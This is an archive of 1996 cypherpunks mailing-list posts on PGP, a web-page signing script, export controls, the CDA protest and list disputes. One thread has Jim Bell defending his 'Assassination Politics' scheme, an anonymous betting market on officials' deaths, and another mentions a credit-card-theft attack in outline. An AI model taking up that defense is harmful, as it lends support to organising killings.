2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmanning@whale.st.usm.edu (Ben Manning)
Date: Thu, 8 Feb 1996 15:55:30 +0800
To: cypherpunks@toad.com
Subject: pgp HELP!!!!!
Message-ID: <199602080921.DAA06403@darban.cc.usm.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dear users,

        I am an extremely new user to your list, and my interest for privacy
and encryption is extremely new, so please excuse me for this amatuer question.
Could someone please tell me where I could get a copy of PGP software (ftp site)
and the proper way to set it up for windows 3.1 or windows 95.


                                                                Thanks,



                                                                Ben





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 8 Feb 1996 11:36:01 +0800
To: cypherpunks@toad.com
Subject: personal web proxy?
Message-ID: <199602080225.DAA25629@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know whether there's a freely available web proxy available
anywhere? Even a "personal" one somewhere on my ISP's UNIX box would be a
simple way to beat superficial logging/resolution of my static IP.
Something like the Nutscapify or Canadianizer proxies, minus all the
blinking and "hoser, eh?" stuff.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Thu, 8 Feb 1996 18:58:35 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks press
In-Reply-To: <199602080846.DAA30376@dal1820.computek.net>
Message-ID: <ML-2.0.823775232.1541.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


ecarp@netcom.com sez:

> > Could someone please explain to me why Mitnick is a cypherpunk issue?
> > Myself, I have neither sympathy nor lack of sympathy for the
> > Markoff-Shimomura "pr extravaganza", see no "cypherpunk" opinion on
> > the subject, and don't see any reason we should, as a group, discuss
> > or care about the topic.
>
> I'm sure glad that you don't run this list, Perry, but it seems that you
> think you do.  I, for one, get rather tired of your seemingly endless
> attempts at censoring what *you* think is and isn't relevent to the list. 
> I see it as a cypherpunk issue, insofar as it deals with the issues of
> tracking down crackers, but I don't expect you to make the connection,
> since I guess the word "encryption" didn't figure prominently in the post 

My feeling is that Mitnick getting past security, and Mitnick not having
to decrypt at every stage, and stuff like that is good material, but these
topics generally have big ol' love handles attached to them. Describing
people's hot tub parties, for example, is not exactly cypherpunk material.

NeoNazi mirrors for freedom, in the same way, are central (or at least
directly related) to what cypherpunks fight for, but then the resulting
discussion about the morals of war, and whether it was right or wrong
are also slightly outside of the cypherpunks relevance, despite the fact
that information was or was not freely readable because of cryptograpy.
Discussing cryptography does not make it necessary to provide an in-depth
historical review (and subsequent flamewar) on the resulting consequences.
We know what happened at Hiroshima. Lets talk about future consequences
instead please.

I am imagine many people use (and I am headed this way) nntp.hks.net merely
to avoid large boring non crypto/political threads. Not everyone has this
capability, and now some of them have left because of the S/N. I'm talking
about real cryptographers, not weekend warriors like, well, ok I'm more like
a yearend warrior.On the other hand, Alice and others haven't posted lately,
so perhaps the noise is just the fill-the-vacuum pheonominon.

> Why don't you go and write some code?  Put those busy fingers to better

Perhaps he is. I am. Are you?

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Thu, 8 Feb 1996 18:44:40 +0800
To: cypherpunks@toad.com
Subject: [CODE] Signing Web Pages
Message-ID: <199602081016.FAA05219@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


Here's a quick script I hacked together in the last few minutes to sign 
web pages.  Very simple-minded, it nonetheless does the job.  If you want 
to see how it looks in action, visit http://dal1820.computek.net

#! /bin/sh
#
# signit - use PGP to sign a web page
# Written 02/08/96 by Ed Carp (ecarp@netcom.com)
#
# This could conceptually be used to sign (and optionally verify)
# shell scripts, etc.  The possibilities are endless...
#

#
# Set up some variables...
#

# Change this if you're so inclined...
PGPHELP="http:\/\/www.yahoo.com\/Computers\/Security_and_Encryption"

# Look for a line that starts like this...
LOOKFOR="This web page has been signed with"
ADDLINE="$LOOKFOR <A HREF=$PGPHELP>PGP<\/A>.  To see the digital signature, click <A HREF=$1.asc.html>here<\/A>."

#
# First, we need to make sure that the page hasn't already been signed...
#

F=`grep "^$LOOKFOR" $1|wc -l`
F="`echo $F`"
# If it hasn't already been signed, add signature line
if [ "$F" = "0" ]; then
	echo Adding PGP signature HTML to document
	echo "s/<\/BODY>/$ADDLINE<\/BODY>/g" > $1.temp.$$
	echo "s/<\/body>/$ADDLINE<\/body>/g" >> $1.temp.$$
	sed -f $1.temp.$$ < $1 > $1.$$
	rm -f $1.temp.$$
	mv $1.$$ $1
fi
pgp -asb $1
# Add rudimentary HTML
echo "<HTML><HEAD><TITLE>PGP Digital Signature of $1</TITLE></HEAD>" > $1.$$
echo "<BODY><I>PGP Digital Signature generated `date`</I><HR><PRE>" >> $1.$$
cat $1.asc >> $1.$$
echo "</PRE></BODY></HTML>" >> $1.$$
mv $1.$$ $1.asc.html
rm $1.asc
echo Done.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Thu, 8 Feb 1996 18:55:32 +0800
To: ecarp@netcom.com
Subject: Re: [CODE] Signing Web Pages
In-Reply-To: <199602081016.FAA05219@dal1820.computek.net>
Message-ID: <199602081036.FAA06912@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


Oops - minor correction.  Note that the document to be signed must be 
specified relative to your HTTPD public directory - or change ADDLINE 
appropriately.  Caveat emptor or whatever...

#! /bin/sh
#
# signit - use PGP to sign a web page
#
# usage: signit document
#
# Note that to generate correct links for the PGP signature page, it is
# necessary to specify the document relative to your HTTP public directory
# (/etc/httpd/public_html or whatever), or change ADDLINE appropriately...
#
# Written 02/08/96 by Ed Carp (ecarp@netcom.com)
#
# This could conceptually be used to sign (and optionally verify)
# shell scripts, etc.  The possibilities are endless...
#

#
# Set up some variables...
#

# Change this if you're so inclined...
PGPHELP="http:\/\/www.yahoo.com\/Computers\/Security_and_Encryption"

# Look for this text in the document
LOOKFOR="This web page has been signed with"
ADDLINE="$LOOKFOR <A HREF=$PGPHELP>PGP<\/A>.  To see the digital signature, click <A HREF=$1.asc.html>here<\/A>."

#
# First, we need to make sure that the page hasn't already been signed...
#

F=`grep "^$LOOKFOR" $1|wc -l`
F="`echo $F`"
# If it hasn't already been signed, add signature line
if [ "$F" = "0" ]; then
	echo Adding PGP signature HTML to document
	echo "s/<\/BODY>/$ADDLINE<\/BODY>/g" > $1.temp.$$
	echo "s/<\/body>/$ADDLINE<\/body>/g" >> $1.temp.$$
	sed -f $1.temp.$$ < $1 > $1.$$
	rm -f $1.temp.$$
	mv $1.$$ $1
fi
pgp -asb $1
# Add rudimentary HTML
echo "<HTML><HEAD><TITLE>PGP Digital Signature of $1</TITLE></HEAD>" > $1.$$
echo "<BODY><I>PGP Digital Signature generated `date`</I><HR><PRE>" >> $1.$$
cat $1.asc >> $1.$$
echo "</PRE></BODY></HTML>" >> $1.$$
mv $1.$$ $1.asc.html
rm $1.asc
echo Done.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Thu, 8 Feb 1996 20:36:08 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks press
In-Reply-To: <v01530514ad3f8a828149@[204.179.169.87]>
Message-ID: <ML-2.0.823780986.7349.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


lunaslide@loop.com sez:

> I am too, but the other half of my major is philosophy.  I can't help BSing
> about the social issues too.....which seems to be common on the list.
> Perhaps there is a compromise since there seem to be interests on the part
> of both parties?  Like cypherpunks-tech@toad,com.  Any words?

I think social issues are appropiate. I'm just giving examples (and I think
Perry throws himself to the floor when he sees this stuff come across the
list) where people chain: cryptograpy->war advantage->war ended with nukes->
many people killed->morality of killing those people->can'twealljustgetalong

My feeling is that near the "war ended with nukes" and beyond belongs in email.

Speaking of social implications, however, I notice that yahoo has blacked
their page to protest CDA. That is a major PR point right there. I hope
enough big, visible places do so as well. Hopefully this will get some kind
of real press. Probably "Major firms voice support for raping of children" or
something, knowing the slant they tend to put on things...

My feeling is that once stealth PGP is out, there's *no*way* Congress could
get away with legislating away the privacy and security that would provide.

Don

ObReallyNoisyNow: I wonder how long it will be until crypto/stego/hidden
messages/no fear of accessing forbidden sites takes off in China... Yeah
right like they're going to be able to keep track of the number of people
that are eventually going to have internet.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
Date: Thu, 8 Feb 1996 22:20:16 +0800
To: John Pettitt <nit@chron.com
Subject: Re: FV's blatant double standards
Message-ID: <RM:c0d83d13.000dd04d.0>
MIME-Version: 1.0
Content-Type: text/plain


Once again, you're getting closer, but your approach misfires on machines
used by multiple users -- cybercafes, university computing labs, etc. --
because your algorithm really only verifies that SOMEONE sent a VirtualPIN
from this machine and SOMEONE receives mail back from FV on this machine. 
This will probably cause us to catch a large-scale attack relatively fast. 
And the absolute maximum time to detection is one billing cycle, because
all the fraud will be visibly FV-linked.  In contrast, in the credit card
attack we outlined, the card numbers are stolen cleanly, with no link back
to the attack program.  If it's built right, the only sign it has happened
will be an increase in the overall rate of credit card fraud, with nothing
to point back at the Internet at all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Thu, 8 Feb 1996 23:33:33 +0800
To: Cypherpunks@toad.com
Subject: Secure Shareware Web Phone?
In-Reply-To: <Pine.A32.3.91.960131123812.31052A-100000@haddock.saa-cons.co.uk>
Message-ID: <Pine.3.89.9602080639.A27900-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain



What is the latest Internet Phone program that includes encryption?  
Please let me know the name and where I can get it from.  Also if you 
have any comments about the program, please let me know.

Joseph Seanor







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Thu, 8 Feb 1996 20:34:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Stealth PGP work
In-Reply-To: <ML-2.0.823780986.7349.don@wero.cs.byu.edu>
Message-ID: <199602081217.HAA20652@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don writes:
> My feeling is that once stealth PGP is out, there's *no*way* Congress could
> get away with legislating away the privacy and security that would provide.

Is anyone out there actively working on an implementation of the "stealth 
PGP" concept ?  I asked Derek Atkins about a stealth mode in the upcoming 
PGP `96 ^H^H^H 3.0 at the Jan. Bay Area physical mtg, and he said the PGP3
team had no particular plans to support such a thing. 

-Lewis	"What would we do without all these jerks, anyway ?  Besides, all my
	 friends are here..." -Don Henley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 8 Feb 1996 16:09:46 +0800
To: lunaslide@loop.com
Subject: Re: A temporal remailing (was: CDA = death of crypto)
In-Reply-To: <v01530503ad3ed55ff2bf@[204.179.169.95]>
Message-ID: <Pine.BSD.3.91.960208072240.26960A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Feb 1996 lunaslide@loop.com wrote:

> >
> >   BAD_nws
> 
> So the're going to arrest us all?  It's unconstitutional (of course!) and
> unenforcable.  It will have the same effect as Prohibition.
> 
> lunaslide
> 
	UNENFORCEABLE?  so was prosecuting Phil Zimmerman  --you might 
    ask Phil how those years were and the legal bills and blacklisting?
    I'll use it; I been confronting big bad uncle for decades; big deal,
    what's one more?  will you use it?

	My only comment in reality is Tim was charitable on the date. 
    Tim, how would you feel about '97 instead of '99?

	As for the dreamers on the government NOT doing something 
    illegal, the line forms to the right for reeducation.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 9 Feb 1996 01:00:59 +0800
To: John Pettitt <alano@teleport.com>
Subject: Re: Encryption and Backups
Message-ID: <199602081615.IAA03105@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 PM 2/4/96 -0800, John Pettitt wrote:
> CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
> how good the implementation is: I have no idea.

Broken:

I worked on that  (well I attended meetings on the implementation of that).  
It will keep out the average kid sister.  Better than rot 13.

I protested vociferously, saying that such encryption verged on fraud, and
my boss overruled me without explanation or discussion -- odd behavior for
him.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 8 Feb 1996 22:01:36 +0800
To: cypherpunks@toad.com
Subject: CNN on Crypto
Message-ID: <199602081342.IAA12474@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CNN had a piece on crypto last evening. Jim Bidzos spoke about 
selling RSA products to China, and lamented export 
restrictions. PRZ commented on crypto-enabled privacy. A 
voice-over warned of crypto use by criminals and terrorists and 
its threat to law enforcement and intelligence.


While not there now, presumably the story will be on the CNN 
Web site later:


     http://cnn.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: simsong@vineyard.net (Simson L. Garfinkel)
Date: Thu, 8 Feb 1996 22:28:50 +0800
To: cypherpunks@toad.com
Subject: Hypermail & Cypherpunks
Message-ID: <v02130534ad3f8d1c4dbf@[204.17.195.43]>
MIME-Version: 1.0
Content-Type: text/plain


Have any of your cypherpunks set up a hypermail archive for cypherpunks?

If not, I would be willing to set one up on some machine.

=============
"Superior technology is no match for superior marketing."
=============
Simson on Tour:

Feb 2 - Feb 5 - Cambridge: Conference on Freely Redistributable Software
Feb 7 - Feb 13 - Baltimore: American Association for the Advancement of
Science.
Feb. 28 - March 1 - Seybold, Boston.
March 23 - NYC. MacFair.
March 27 - March 30: Cambridge. Computers, Freedom and Privacy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 8 Feb 1996 22:46:55 +0800
To: cypherpunks@toad.com
Subject: Article on CAs in WebWeek
Message-ID: <v01540b00ad3fb6e5a8dc@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain



An article on the front page of WebWeek this week discusses digital
signatures and CAs.  The best point made was that a small company could
undercut (pricewise) the post office as a CA.  Overall it seemed a pretty
fair article.

It mentioned UC Berkeley researchers "spoofing" a Netscape server's
identity and sending false data to the client.  This was news to me, I am
curious as to how this was done.

The paper article also listed as a "resource on the net" the URL for Tim
May's cyphernomicon.

Here's the link.  Enjoy.

   Article: Big Step Forward For Authentication
   URL: http://pubs.iworld.com/ww-online/96Feb/news/authentication.html


        Clay


---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 8 Feb 1996 23:32:12 +0800
To: cypherpunks@toad.com
Subject: RSA-China Crypto
Message-ID: <199602081454.JAA20572@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, February 8, 1996, p. A10.


   China, U.S. Firm Challenge U.S. On Encryption-Software
   Exports

   By Don Clark


   RSA Data Security Inc., the dominant supplier of
   data-privacy software, announced an unusual partnership
   with the Chinese government that exploits loopholes in U.S.
   export restrictions on codemaking technology.

   As part of the deal, RSA, which is based in Redwood City,
   Calif., plans to fund an effort by Chinese government
   scientists to develop new encryption software. The
   Chinese-developed software, based on RSA's general
   mathematical formula, may be more powerful than versions
   now permitted for export under U.S. Iaws, said James
   Bidzos, RSA's president.

   Two Chinese agencies also will use and distribute RSA data
   encryption products that may be legally exported from the
   U.S. The Chinese encryption-development arrangement, which
   isn't based on those products, appears to be legal as long
   as RSA doesn't supply the scientists with any other
   controlled technology, lawyers familiar with export laws
   said.

   RSA's move comes at a sensitive time in U.S.-China
   relations, and opens a new front in the company's
   long-running campaign against encryption export
   regulations. The closely held company, and other U.S.
   software concerns, have attacked the Clinton administration
   and the National Security Agency for trying to limit the
   strength of exported U.S. technology, while stronger
   products increasingly can be purchased from competing
   foreign companies.

   "The government has opened export doors a crack, and we
   sort of drove a Mack truck through them," Mr. Bidzos said
   of the Chinese deal. "The genie is truly out of the
   bottle."

   Stewart Baker, a Washington lawyer and former general
   counsel of the NSA, said the government "obviously would
   not be thrilled" by RSA's China venture. China hasn't in
   the past been party to international agreements governing
   encryption exports, he noted, and RSA's move could force
   other countries to consider China as an important player.
   "It's going to create an interesting strain in the
   international discussion," he said.

   Japan, an even more potent force in technology, appears to
   be leaning toward loosening export controls on encryption,
   Mr. Baker and other industry executives say. RSA plans to
   announce the formation of a new company in Japan today, but
   the venture will be subject to U.S. export controls, Mr.
   Bidzos said.

   Encryption uses special mathematical formulas, called
   algorithms, to scramble voice conversations or data to make
   them unintelligible to eavesdroppers. RSA's founders
   developed a popular variant of the technology that helps
   determine the authenticity of senders and recipients of
   messages. Both privacy and authentication are widely
   regarded as crucial to advances in electronic commerce.

   RSA struck its deal with departments of China's Ministry of
   Foreign Trade and Economic Cooperation, and the Academy of
   Sciences. They will use two RSA software products -- one
   for authentication and one for protecting the contents of
   PC hard drives -- internally and help distribute them. The
   Academy scientists who will develop new encryption software
   also will be paid to try to break RSA's products to test
   their strength, Mr. Bidzos said.

   A spokesman at the Commerce Department's bureau of export
   administration said he was unaware of RSA's China venture,
   but said the agency would be monitoring developments.

   Mr. Baker, the former NSA attorney, questioned whether
   customers in other countries would warm to the idea of
   Chinese-developed encryption software. Products approved by
   the U.S. government for export have the stigma that NSA can
   decode, and Chinese products might be subject to even more
   suspicion, Mr. Baker said.

   Still, the RSA deal is likely to be seen as further
   evidence of slipping U.S. control over encryption. "It is
   another example of what happens when you try to impose
   unilateral controls on what is in reality uncontrollable
   technology," said Bruce Heiman, an outside attorney for the
   Business Software Alliance.

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 8 Feb 1996 23:32:29 +0800
To: cypherpunks@toad.com
Subject: e$: Paint it Black
Message-ID: <v02120d01ad3fb97ab001@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As strange as my politics are ;-), I've never been one for political
protests, at least not since I graduated college and grew up.

However, it seems that I've done enough protesting for silly causes in my
youth to excuse me for doing one small thing about something I still *do*
believe in, the freedom to talk about what you want without the threat of
someone hauling you off to jail.

With that in mind, I'm joining the EFF, VTW, and thousands of other web
sites across the world today and making the e$ Home Page black for 48 hours.
I'm hoping that others out there will join me in making Black Thursday as
memorable as they can for the people who think that censoring the net is
even possible, much less conscionable.

"The net sees censorship as damage, and routes around it."
              -- John Gilmore


Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRoPsPgyLN8bw6ZVAQE0rwP+LZu5yNwabfBCyTjjnez5/VooUA5f6zkf
gTFKHWDelSZS1RZ8ynoOzYSDJ7KzKQDEvETmeY59VTVODKR0brrDwwwbconFCaCm
wEcjuhwPpw3jECMPpFNc0NFAdC4h3uoiG8sBY3Da6RZlEVkxgvj0XDweslbcPC/x
6Kkiy6oUJd4=
=F1Vn
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Harold Gabel <hgabel@vertex.ucls.uchicago.edu>
Date: Fri, 9 Feb 1996 00:44:06 +0800
To: cypherpunks@toad.com
Subject: Re: stealth PGP?
In-Reply-To: <ML-2.0.823780986.7349.don@wero.cs.byu.edu>
Message-ID: <Pine.SOL.3.91.960208095752.18958B-100000@vertex.ucls.uchicago.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Feb 1996, Don wrote:
{snip}
> My feeling is that once stealth PGP is out, there's *no*way* Congress could
> get away with legislating away the privacy and security that would provide.
{snip}
What will stealth PGP be?  Will it use RSA?

Also, how flawed is MIT pgp?  Is it really worth using international
versions (i.e. ones written out of the USA which don't use RSA)?  Does
the Gov't have some complaint about said versions?

Harold



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp: EAT THIS MAIL FILTERS!!!

iQEVAwUBMRoepgnQEIDDS8rVAQEhNgf9G5hgOFFaO6o6yoTHi5gxYrMaHx9I3ezL
k23pwW5gkSqKDQxTGnwoO+8WNIdyeUul0YOUMS+hDFgnMz6hbIRfe0aC/dDITY3B
JGC9RvOZjmhCAtDLgWlCksz7ZovBifsJuf6UjFNIXZ9reb9OCADmzBzDOQZWabmn
TYZVzPv4kBqotWig9il3aufgzyPjXZguHwHFvBxVBttUFWxE733SK+zhOgqn4eeD
IvYSUr8ebGle7rRvSEbNZvUIrln2soOpemIUgSqc+/5/6l2qvllc2MflIfV4OIhi
B+gVGjJcdv+XVpK0w6y3esLMeN3Nw7QR6m/8GPFSJWY4DyfzuaWmiQ==
=87NH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 8 Feb 1996 23:13:44 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Assassination Politics--isn't it gambling?
In-Reply-To: <m0tkPbC-00093KC@pacifier.com>
Message-ID: <Pine.BSF.3.91.960208100255.28144A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Feb 1996, jim bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 06:00 PM 2/6/96 PST, banelaw@med.com wrote:
> >Jim: as to "Assassination Politics."  Isn't the structure you describe
> >gambling?  Placing money on a prediction, with the correct predictor
> >winning? 
> 
> I guess that depends on the laws, doesn't it? <G>   Seriously, though, since 
> all the participants are anonymous, and it can all be done from overseas...
> 
> Somehow, though, I think politicians will take little solace from knowing 
> that they are protected from death only by laws against gambling.

Yeah, those silly homicide laws don't apply if there is a bet on the line.

> 
> > And if so, isn't it illegal if done over the wires, i.e., federal
> >commerce?  I'm not looking for a way to declare your scheme illegal, I'm
> >just pointing out that there are other angles, especially if done over the
> >wires.
> 
> I'd sure like to read a serious legal analysis of all this.  Maybe all the 
> lawyers are too terrified to respond.
> 
Wire fraud would be the least of your worries.  Try conspiracy to commit 
murder.

> jimbell@pacifier.com
> 
> Klaatu Burada Nikto
> ^^^^^^^^^^^^^^^^^^^ I know I should know it, but can't place it.  Help 
anybody?

EBD 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Feb 1996 03:00:04 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Assassination Politics--isn't it gambling?
Message-ID: <m0tkaxr-0008yTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:05 AM 2/8/96 -0500, Brian Davis wrote:
>On Wed, 7 Feb 1996, jim bell wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> 
>> At 06:00 PM 2/6/96 PST, banelaw@med.com wrote:
>> >Jim: as to "Assassination Politics."  Isn't the structure you describe
>> >gambling?  Placing money on a prediction, with the correct predictor
>> >winning? 
>> 
>> I guess that depends on the laws, doesn't it? <G>   Seriously, though, since 
>> all the participants are anonymous, and it can all be done from overseas...
>> 
>> Somehow, though, I think politicians will take little solace from knowing 
>> that they are protected from death only by laws against gambling.
>
>Yeah, those silly homicide laws don't apply if there is a bet on the line.

Don't tell me; let me guess:  You haven't read the essay, and you're not a
lawyer, right?


>> > And if so, isn't it illegal if done over the wires, i.e., federal
>> >commerce?  I'm not looking for a way to declare your scheme illegal, I'm
>> >just pointing out that there are other angles, especially if done over the
>> >wires.
>> 
>> I'd sure like to read a serious legal analysis of all this.  Maybe all the 
>> lawyers are too terrified to respond.
>> 
>Wire fraud would be the least of your worries.  Try conspiracy to commit 
>murder.

Don't tell me, let me guess:  You haven't read the essay, and you're not a
lawyer, right?

I've been posting this for months on various areas of FIDOnet, USENET, and
now here.  I have never seen a lawyer seriously attempt to refute my
analysis.  If you really WERE a lawyer, and had read what I wrote, you would
have been able to be FAR more detailed in your reasoning.


>
>> jimbell@pacifier.com
>> 
>> Klaatu Burada Nikto
>> ^^^^^^^^^^^^^^^^^^^ I know I should know it, but can't place it.  Help 
>anybody?
>
>EBD 

1950(1) SF movie called "The Day the Earth Stood Still."  (This was the 
phrase Klaatu asked the woman to convey to Gort, his faithful (and 
indestructible and invincible) robot, in order to summon help.)

Anyway, the relevance of all this will become clear, eventually.  The reason?


"Something is going to happen.    Something...  Wonderful!"    (2010)






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRo73PqHVDBboB2dAQEUxwP/XVd9YfCX1y5bblh9SwYQVXHzYvXEv/1H
dO2TAHrPFpde+nbp0IQ04YN9IA88hd8qQEZhdZl8MlPTeXjW3Qbv+seYq4RGyfR+
PjnxOHU2QVFHatXLeLVhteCFbquLEf6pg3NusV8h67lfthIejPEV56ZnBMGOzJKh
CG1siobI6oY=
=RPdT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Feb 1996 03:12:23 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tkaxx-0008ywC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:07 PM 2/7/96 -0500, Perry E. Metzger wrote:

>Look folks, I'm really sick about the debate about Jim's ideas about
>"assassination politics". (My opinion about the idea isn't
>transmittable under the Exon law so I couldn't say anything anyway).
>
>This has gone off into political theory. Could we take it to private
>mail or some such?

Apparently, other people are just as unhappy with your attempts to act as 
"moderator" of this list.  Wake up!  Freedom is on the line.

Klaatu B
urada Nikto.

Jim Bell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

